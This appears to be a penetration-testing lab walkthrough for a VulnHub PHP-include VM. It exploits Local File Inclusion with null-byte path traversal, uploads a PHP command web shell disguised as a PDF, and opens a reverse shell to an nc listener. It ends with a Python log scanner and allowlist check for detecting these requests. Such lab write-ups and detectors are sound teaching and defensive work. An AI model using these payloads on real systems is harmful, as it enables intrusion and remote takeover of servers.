Local File Inclusion[LFI]

Target Pentester Lab: Download from the following website:

https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

1. Use netdiscover to find the IP of the target server. The IP address of the target server is 10.0.0.22.

netdiscover

2. Click the different buttons of the website and watch how the URL changes: the content is selected through a page=XXXX parameter.

3. Scan the target website using the tool nikto.

nikto -h 10.0.0.22

4. Change the URL to "http://10.0.0.22/index.php?page=../../etc/shadow%00" and press Enter. The page returns the following warning message.

5. Return to the submit page, which allows PDF files to be uploaded to the website.

6. Create a file named shell.pdf with the following content and save it.

%PDF-1.4

<?php
system($_GET["cmd"]);
?>

7. Upload shell.pdf to the target website.

8. Change the URL to the following form, passing the shell command in the cmd parameter.

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=whoami

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=pwd

9. Download a web shell from the following website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

10. Modify the web shell file: (1) add the PDF header; (2) change the IP and port.

11. Copy the PHP shell file to shell2.pdf and upload it to the website.

cp php-reverse-shell.php shell2.pdf

12. Listen on port 4444 on the Linux machine.

nc -nvlp 4444

13. Browse to the following URL in Firefox.

http://10.0.0.22/index.php?page=uploads/shell2.pdf%00

14. The reverse shell connects back to the listener, and we can then run whatever shell commands we like from the terminal.
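From the defender's side, the requests made in steps 4, 8 and 13 leave a recognisable trace in the web server's access log, and the include handler can reject them outright with an allowlist. The following Python script is an added example, not part of the original notes or of the lab: it runs the detection over constructed Apache-style log lines that mirror this walkthrough, and page_is_safe shows the allowlist check (the allowed page names are assumed).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not captured from the lab VM) covering the
# requests in this walkthrough: traversal with a null byte, an uploaded "PDF"
# included as a PHP web shell, and one benign page load.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?page=submit HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?page=../../etc/shadow%00 HTTP/1.1" 200 744
10.0.0.5 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?page=uploads/shell.pdf%00&cmd=whoami HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php?page=uploads/shell2.pdf%00 HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Assumed set of pages the application legitimately serves via ?page=.
ALLOWED_PAGES = {"home", "submit", "about"}

def page_is_safe(value: str) -> bool:
    """Allowlist check an include handler should apply to the decoded ?page= value."""
    if "\x00" in value or "/" in value or "\\" in value or ".." in value:
        return False
    return value in ALLOWED_PAGES

def classify_request(path: str) -> list[str]:
    """Return the LFI indicators found in one request path (empty list if none)."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)  # values are URL-decoded here
    findings = []
    for value in query.get("page", []):
        if "\x00" in value:
            findings.append("null byte in page parameter")
        if ".." in value:
            findings.append("path traversal in page parameter")
        if re.search(r"uploads/.*\.(pdf|jpg|png|gif|txt)", value, re.I):
            findings.append("include of an uploaded non-PHP file")
    if "cmd" in query:
        findings.append("cmd parameter alongside page (web shell usage)")
    return findings

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan access-log text; return (request path, indicators) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (found := classify_request(m.group(1))):
            hits.append((m.group(1), found))
    return hits

if __name__ == "__main__":
    for path, found in scan_log(SAMPLE_LOG):
        print(path, "->", "; ".join(found))
```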
